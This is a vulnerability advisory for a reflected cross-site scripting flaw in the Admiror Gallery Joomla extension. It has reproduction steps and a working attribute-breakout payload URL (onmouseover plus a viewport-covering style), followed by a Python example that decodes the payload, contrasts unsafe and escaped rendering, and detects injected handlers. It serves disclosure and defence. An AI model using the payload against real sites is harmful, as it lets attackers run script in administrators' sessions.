Description
Cross-site scripting (XSS) is an attack in which an attacker injects script into a page served by a trusted application or website so that it runs in a victim's browser with that site's origin. A reflected XSS attack typically starts with a malicious link: the attacker entices a user into opening it, and if the application echoes the request data into the page without proper output encoding, the attacker's script executes in the user's session. That script can read anything the page can, including the session cookie unless it is marked HttpOnly, and can issue requests as the logged-in user.
Admiror Gallery contains a reflected XSS vulnerability in the AG_resourceType parameter of its administrator-side resource manager. The payload breaks out of an HTML attribute and adds an onmouseover handler, so it needs slightly more user interaction than a typical XSS (a mouse movement over the page rather than just opening the link); the injected style stretches the affected element over the whole viewport so that almost any mouse movement triggers it. It is still easy to exploit and runs arbitrary JavaScript in the victim's session.
Severity: Medium
CVSS Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Steps to reproduce
Install Joomla 3 and install the Admiror Gallery extension
Publish the extension
Log in to the Joomla administrator backend and visit the URL below (192.168.1.21 is the test host used in this report)
http://192.168.1.21/administrator/index.php?option=com_admirorgallery&task=popups&option=com_admirorgallery&task=ag_install&boxchecked=01111&view=resourcemanager&controller=resourcemanager&AG_resourceType=popupseeou3%22onmouseover%3d%22alert(domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22n58mtbbt7z6&a754e24e813c693db361a8d5cf6f1f1c=1&AG_fileUpload=&checkall-toggle=&cid[]=fancybox&cid[]=fancybox-downloadButton&cid[]=pirobox&cid[]=slimbox&limitstart=0
Move the mouse over the page: the reflected AG_resourceType value has closed its attribute early, and the injected onmouseover handler runs alert(domain)
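The following is an added example, not code from this advisory or from Admiror Gallery. It decodes the AG_resourceType value from the reproduction URL above and shows, using Python's own HTML tokenizer, why the payload works: reflected unencoded inside a double-quoted attribute, the first " closes the value and the rest of the parameter is tokenized as new attributes (onmouseover and style). The render_unsafe and render_safe functions are hypothetical stand-ins for the extension's template, not its real code; html.escape(quote=True) plays the role PHP's htmlspecialchars($v, ENT_QUOTES, 'UTF-8') would play in the fix.

```python
# Added example; the render_* functions are hypothetical, not Admiror Gallery code.
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the reproduction URL from the steps above.
REPORT_URL = (
    "http://192.168.1.21/administrator/index.php?option=com_admirorgallery"
    "&task=popups&option=com_admirorgallery&task=ag_install&boxchecked=01111"
    "&view=resourcemanager&controller=resourcemanager"
    "&AG_resourceType=popupseeou3%22onmouseover%3d%22alert(domain)%22style%3d%22"
    "position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
    "n58mtbbt7z6&a754e24e813c693db361a8d5cf6f1f1c=1&AG_fileUpload=&checkall-toggle="
    "&cid[]=fancybox&cid[]=fancybox-downloadButton&cid[]=pirobox&cid[]=slimbox&limitstart=0"
)


def resource_type_param(url: str) -> str:
    """Return the URL-decoded AG_resourceType value, i.e. what PHP's $_GET holds."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query["AG_resourceType"][0]


def render_unsafe(resource_type: str) -> str:
    """Hypothetical vulnerable pattern: request data concatenated straight into a
    quoted attribute (PHP: '<input ... value="' . $_GET['AG_resourceType'] . '">')."""
    return f'<input type="text" name="AG_resourceType" value="{resource_type}">'


def render_safe(resource_type: str) -> str:
    """Hardened form: encode & < > " and ' for the attribute context first.
    html.escape(quote=True) matches htmlspecialchars() with ENT_QUOTES."""
    encoded = html.escape(resource_type, quote=True)
    return f'<input type="text" name="AG_resourceType" value="{encoded}">'


class _AttrCollector(HTMLParser):
    """Record the attributes of the first start tag, the way a tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def attributes_seen_by_browser(markup: str) -> dict:
    """Tokenize the markup and return {attribute name: value} for its first tag."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs or {}


def has_injected_handler(markup: str) -> bool:
    """Detection check: a text input carries no on* attributes, so finding one
    means the reflected value escaped its attribute and became markup."""
    return any(name.startswith("on") for name in attributes_seen_by_browser(markup))


if __name__ == "__main__":
    payload = resource_type_param(REPORT_URL)
    print("decoded AG_resourceType:", payload)
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        markup = render(payload)
        print(f"{label}: injected handler = {has_injected_handler(markup)}")
        print("  attributes:", attributes_seen_by_browser(markup))
```

Run it and compare the two attribute maps: the unsafe rendering yields separate onmouseover and style attributes (the style covering the viewport is what makes a mere mouse movement enough), while the safe rendering yields a single value attribute whose decoded content is the original payload, inert. The same check can be pointed at a captured HTTP response body to confirm whether a fix actually encodes the parameter.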
POC
https://github.com/vasiljevski/admirorgallery/assets/51406427/bab39814-5f2a-4737-951f-31411bca0d7a
The vulnerability was discovered in collaboration with @SivaPothuluru-sajja